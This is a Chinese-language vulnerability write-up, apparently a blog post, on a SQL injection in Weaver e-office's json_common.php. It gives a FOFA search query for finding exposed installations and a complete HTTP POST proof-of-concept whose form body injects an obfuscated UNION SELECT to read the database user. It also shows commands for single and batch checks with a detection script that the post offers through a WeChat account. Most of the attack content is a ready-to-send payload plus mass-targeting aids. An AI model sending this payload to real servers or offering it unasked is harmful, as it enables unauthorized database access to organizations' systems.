泛微e-office json_common.php SQL注入漏洞

一、漏洞描述

泛微e-office为企业办公提供丰富应用,覆盖常见协作场景,开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求,帮助组织高效管事理人。

系统 json_common.php 文件存在SQL注入漏洞

二、网络空间搜索引擎搜索

fofa查询

复制代码
app="泛微-EOffice"

三、漏洞复现

poc

复制代码
POST /building/json_common.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LOGIN_LANG=cn; PHPSESSID=bd702adc830fba4fbcf5f336471aeb2e
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,user() ,4#|2|333

四、漏洞检测

单个检测

复制代码
python json_commonSQLcheck.py -u url[例 http://127.0.0.1:8080]

批量检测

复制代码
python json_commonSQLcheck.py -f filename

关注公众号 网络安全透视镜 回复 20231018 获取批量检测脚本

相关推荐
亚马逊云开发者30 分钟前
全景解读亚马逊云科技的 GenBI 解决方案:三大路径助力企业智能决策升级
sql·llm
SuperherRo5 小时前
WEB攻防-文件包含&LFI&RFI&伪协议编码算法&无文件利用&黑白盒
php·文件包含·伪协议·lfi·无文件·黑白盒·rfi
双力臂40411 小时前
MyBatis动态SQL进阶:复杂查询与性能优化实战
java·sql·性能优化·mybatis
A__tao12 小时前
一键将 SQL 转为 Java 实体类,全面支持 MySQL / PostgreSQL / Oracle!
java·sql·mysql
A__tao13 小时前
SQL 转 Java 实体类工具
java·数据库·sql
用户Taobaoapi201415 小时前
Taobao agent USA丨美国淘宝代购1688代采集运系统搭建指南
数据挖掘·php
蓝色记忆15 小时前
Classmap 如何兼容旧代码
php
蓝色记忆18 小时前
Composer PSR-4 自动加载机制的完整流程
php
羊小猪~~19 小时前
数据库学习笔记(十七)--触发器的使用
数据库·人工智能·后端·sql·深度学习·mysql·考研
only-lucky21 小时前
C语言socket编程-补充
服务器·c语言·php